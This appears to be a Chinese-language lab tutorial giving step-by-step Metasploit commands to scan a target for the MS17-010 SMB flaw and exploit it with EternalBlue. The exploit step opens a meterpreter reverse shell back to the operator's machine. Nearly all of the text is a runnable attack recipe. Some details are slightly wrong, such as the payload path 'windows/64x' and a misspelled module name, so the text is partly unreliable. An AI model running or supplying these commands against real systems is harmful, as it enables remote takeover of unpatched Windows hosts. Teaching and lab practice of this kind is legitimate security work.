1.在操作系统kali上打开终端,使用以下命令启动Metasploit终端:
msfconsole
2.检查靶机是否存在ms17-010漏洞
(1)搜索ms17-010相关模块:
search ms17-010
(2)分别输入以下命令,使用amb_ms17_010模块进行漏洞检测,确认其存在ms17-010漏洞:
use auxiliary/scanner/smb/smb_ms17_010 //使用模块
show options //查看模块需要设置哪些参数
set RHOSTS 靶机ip //设置目标机的ip
run //执行
3.关于缓冲区溢出攻击,exploit模块使用
(1)分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:
use exploit/windows/smb/ms17_010_eternalblue //进入 ms17_010_eternalbluemok
set RHOST 靶机ip // 设置远程主机ip地址
set LHOST 操作机ip // 设置本地主机ip
set payload windows/64x/meterpreter/reverse_tcp //使用payload:meterpreter/reverse_tcp
set RPORT 445 //设置目标端口
set target 0 //设置目标操作系统类型
run